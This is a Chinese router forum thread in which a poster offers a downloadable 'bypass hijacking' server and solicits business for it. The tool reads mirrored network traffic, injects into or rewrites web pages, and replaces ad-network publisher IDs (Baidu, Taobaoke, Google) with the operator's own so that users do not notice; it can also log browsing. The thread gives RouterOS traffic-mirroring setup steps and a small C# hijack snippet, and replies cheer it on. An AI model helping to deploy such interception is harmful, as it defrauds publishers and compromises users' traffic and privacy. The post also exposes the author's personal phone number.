找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 57463|回复: 32

[策略设置] 旁路劫持程序(非ROS版、内网预览版)[网页内容劫持替换,Url劫持,各种广告联盟劫持]

  [复制链接]
发表于 2013-6-5 03:17:36 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
本帖最后由 sone 于 2013-6-5 19:50 编辑

hijackingServer.zip (95.43 KB, 下载次数: 635)

需要.NET2.0!



只能在Windows 2003、Windows 2008系统上运行,非服务器系统无法运行。
将config.ini的SnifferListenIP配置键值改为本机IP。

系统可以完全不依靠routeros!!!可用于没有RouterOS环境的网络,只要交换机有镜像、分光功能或者数据包能到达服务器就行!!!
可用于跨网际环境,可用于城域网和骨干劫持。

如果是交换机镜像流量,直接镜像到这台服务器就行了。

如果是rosROS Sniffer性能底下,不建议使用),在ROS上使用tzsp协议镜像流量,就是Packet Sniffer的那个功能。如果不会看下面的。

在Winbox里面找到Tool->Packet Sniffer。点击第一个标签(Packet),点击Settings,选择第一个标签(General)在Interface里面找到选择内网的网卡,如果有多个内网网卡就选择all。然后点击第二个标签(Streaming),将两个复选框都选中,然后在Server:里面填写上服务器的IP,就是config.ini中SnifferListenIP值。然后Apply,然后Start。



之后,在这个内网下面的任何机器访问任何网页都会被添加?&silmoon这个参数看到了没?

hijackingServer.exe是所有都被追加了?&silmoon参数的。
hijackingServer2.exe是所有都被直接劫持某些文字的!
hijackingServer3.exe是百度搜索silmoon的时候才会被劫持的演示

三个程序每次只可以开一个,大家可以挨个打开看一下。谢谢围观。

这是一个演示版本,这是旁路劫持版本的劫持,不影响网络性能,就算程序死了也没事儿,死了最多就是无法劫持了,只是需要镜像一份流量给服务器,如果是高版本的ros可以只把tcp 80 上行流量镜像给服务器。
理论上可以做任何劫持,包括替换百度联盟号“tn=”,替换淘宝客pid,替换谷歌广告发布商ID,或者劫持百度搜索的某些关键字,更改各种广告框架,哈哈,或者记录任何浏览日志记录。

和老大的东西不一样在于,我这个不是加广告,而是替换所有已有网页上的各种广告,把广告的id和帐号都替换成自己的!!!做到用户神不知鬼不觉,不影响网页样式,不影响用户体验,只是侵害了网站广告发布商

如有需求联系我。接受技术合作。

补充内容 (2014-4-14 01:59):
有很多人问我联系方式,邮箱:sone(a)silmoon.com

补充内容 (2014-4-14 02:00):
也可以短信联系我:15650112341
邮箱:sone(a)silmoon.com

评分

参与人数 2铜板 +80 收起 理由
tangdong + 50 赞一个!
心想事成 + 30 很给力!

查看全部评分

routeros
发表于 2013-6-5 03:26:33 | 显示全部楼层
老大会找你算账的。
routeros
回复

使用道具 举报

发表于 2013-6-5 12:40:02 | 显示全部楼层
明显抢生意啊 哈哈
routeros
回复

使用道具 举报

发表于 2013-6-5 12:59:17 | 显示全部楼层
技术活  值得顶顶
routeros
回复

使用道具 举报

发表于 2013-6-5 14:34:40 | 显示全部楼层
碉堡了,这个东西如果真如楼主所说。价值不低
routeros
回复

使用道具 举报

发表于 2013-6-5 15:19:13 | 显示全部楼层
这个真心要顶一下。
routeros
回复

使用道具 举报

发表于 2013-6-5 15:27:06 | 显示全部楼层
本帖最后由 9939781 于 2013-6-5 15:28 编辑

直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”,替换淘宝客pid,替换谷歌广告发布商ID
只是网页内容替换光靠ROS无法完成。
routeros
回复

使用道具 举报

 楼主| 发表于 2013-6-5 17:10:33 | 显示全部楼层

网页内容理论上也可以做到替换,不过只针对无用户会话的页面,主要是判断host和url这部完全是自己用代码写的,可控性更高。

        public void HijackEntry(byte[] buffer, int len, string host, string url)
        {
            if (url.Contains("wd=silmoon"))
            {
                Console.ForegroundColor = ConsoleColor.Red;

                Console.WriteLine("http://" + host + url);
                callHijack(buffer, len, host, url);
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("http://" + host + url);
            }
        }
routeros
回复

使用道具 举报

发表于 2013-6-5 17:36:25 | 显示全部楼层
本帖最后由 981398 于 2013-6-5 22:09 编辑

技术活,要力顶
-
老大会找你算账的
不知道会不会删帖!
routeros
回复

使用道具 举报

发表于 2013-6-6 22:52:09 | 显示全部楼层
9939781 发表于 2013-6-5 15:27
直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”,替换淘宝客pid,替换谷歌广告发布商ID
只 ...

这个只能实现,能否举例说明
routeros
回复

使用道具 举报

发表于 2013-6-6 22:56:23 | 显示全部楼层
qile 发表于 2013-6-6 22:52
这个只能实现,能否举例说明

成品说明一切
http://www.cat-home.org/?action=show&id=122
routeros
回复

使用道具 举报

发表于 2013-6-7 09:12:50 | 显示全部楼层
9939781 发表于 2013-6-6 22:56
成品说明一切
http://www.cat-home.org/?action=show&id=122

你那个 能实现替换淘宝客代码,百度联盟代码吗?
routeros
回复

使用道具 举报

发表于 2013-6-7 09:34:17 来自手机 | 显示全部楼层
本帖最后由 9939781 于 2013-6-7 09:41 编辑
qile 发表于 2013-6-7 09:12
你那个 能实现替换淘宝客代码,百度联盟代码吗?


只要是基于url的都可以。不过我只搞导航和搜索增值,其他增值不搞。产品内容已经介绍得很清楚了。什么百度,搜狗 tao123 都可以实现定向只劫持有增值id的连接。也可以劫持不带增值id的导航搜索。
routeros
回复

使用道具 举报

发表于 2013-6-7 12:22:49 | 显示全部楼层
这个相当可以啊!
routeros
回复

使用道具 举报

发表于 2013-6-7 18:35:21 | 显示全部楼层
现在的广告做的很给力了,
routeros
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|软路由 ( 渝ICP备15001194号-1|渝公网安备 50011602500124号 )

GMT+8, 2024-12-22 20:01 , Processed in 0.084524 second(s), 8 queries , Gzip On, Redis On.

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表